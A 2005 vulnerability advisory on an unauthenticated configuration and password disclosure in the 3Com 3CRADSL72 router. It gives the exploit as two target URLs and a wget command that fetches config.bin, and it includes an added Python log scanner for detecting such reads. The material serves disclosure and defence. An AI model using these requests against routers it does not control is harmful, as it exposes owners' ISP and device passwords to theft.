3com adsl 11g cradsl72 router config.bin information disclosure

Saturday, April 02, 2005
########################################
3com adsl 11g 3cradsl72 router config.bin information disclosure.
vendor url: http://www.3com.com/
vendor notified: yes exploit available: yes
advisory url: http://lostmon.blogspot.com/2005/04/3com-adsl-11g-cradsl72-router.html
discovered by Lostmon & vIOsOnE
last update: 2005/04/02 update solution.
OSVDB ID:15181
Secunia: SA13942
########################################

Some time ago, some flaws were discovered in the 3com wireless cradsl72 router.
A new flaw was discovered by me and vIOsOnE: a remote user can obtain
all details about the configuration of the device and all passwords
(Internet provider and router password) without authentication.

firmware versions affected :

1.02b affected
1.05 affected
1.10 not affected

solution:

Upgrade to version 1.10 or higher, as it has been reported to fix this vulnerability.
An upgrade is required as there are no known workarounds.

exploit :

1- Open your router at this address: http://[target]/app_sta.stm
and we can see the password of the Internet provider.

2- Copy and paste this URL: http://[target]/cgi-bin/config.bin
and we obtain the configuration file; inside are all details about the
configuration, including the password of the device.


Also, if you want to bypass all authentication without using
a web browser, you can use the wget tool to fetch this:

wget http://xxx.xxx.xxx.xxx/cgi-bin/config.bin

With wget, only one URL is needed to exploit this issue.
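
For defenders, the two requests described above can be spotted in HTTP logs. The following is an added example, not part of the original advisory: it assumes a proxy or sensor in front of the router's web interface writes Combined Log Format, that a "-" user field means no authenticated user, and that paths match case-insensitively; the log lines are constructed.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Paths named in the advisory as readable without authentication.
SENSITIVE_PATHS = {"/cgi-bin/config.bin", "/app_sta.stm"}

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def canonical_path(target):
    """Normalise a request target so encoded or padded variants still match."""
    path = target.split("?", 1)[0]                            # drop query string
    path = re.sub(r"^[a-z]+://[^/]+", "", path, flags=re.I)   # absolute-URI form
    path = unquote(path).lower()         # %5F -> _ ; case-insensitive (assumption)
    return normpath("/" + path.lstrip("/"))                   # collapse // and ./

def find_unauthenticated_reads(lines):
    """Return (ip, time, path, size) for anonymous, successful reads of a sensitive path."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = canonical_path(m["target"])
        if (path in SENSITIVE_PATHS and m["user"] == "-"
                and m["status"] == "200" and m["method"] in ("GET", "POST")):
            hits.append((m["ip"], m["time"], path, m["size"]))
    return hits

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Apr/2005:10:15:01 +0000] "GET /cgi-bin/config.bin HTTP/1.0" 200 16384 "-" "Wget/1.9.1"',
    '203.0.113.7 - - [02/Apr/2005:10:15:09 +0000] "GET /cgi-bin//CONFIG.bin?x=1 HTTP/1.0" 200 16384 "-" "-"',
    '192.168.1.20 - admin [02/Apr/2005:10:20:44 +0000] "GET /cgi-bin/config.bin HTTP/1.1" 200 16384 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [02/Apr/2005:11:02:13 +0000] "GET /cgi-bin/config.bin HTTP/1.0" 401 0 "-" "-"',
    '198.51.100.9 - - [02/Apr/2005:11:02:30 +0000] "GET /app%5Fsta.stm HTTP/1.0" 200 2048 "-" "-"',
    '192.168.1.20 - - [02/Apr/2005:11:05:00 +0000] "GET /index.stm HTTP/1.1" 200 512 "-" "-"',
]

if __name__ == "__main__":
    for ip, when, path, size in find_unauthenticated_reads(SAMPLE_LOG):
        print(f"{when}  {ip}  read {path} ({size} bytes) without authentication")
```

A hit against a device that should be running 1.10 or higher suggests the upgrade was not applied; any hit on affected firmware means the stored passwords should be treated as exposed and changed after upgrading.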


thnx to estrella for being my light
thnx to all who support me day by day
thnx to vIOsOnE, he is with me and investigates ;)
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data mangler of: http://www.osvdb.org

Curiosity is what makes the mind move....
 
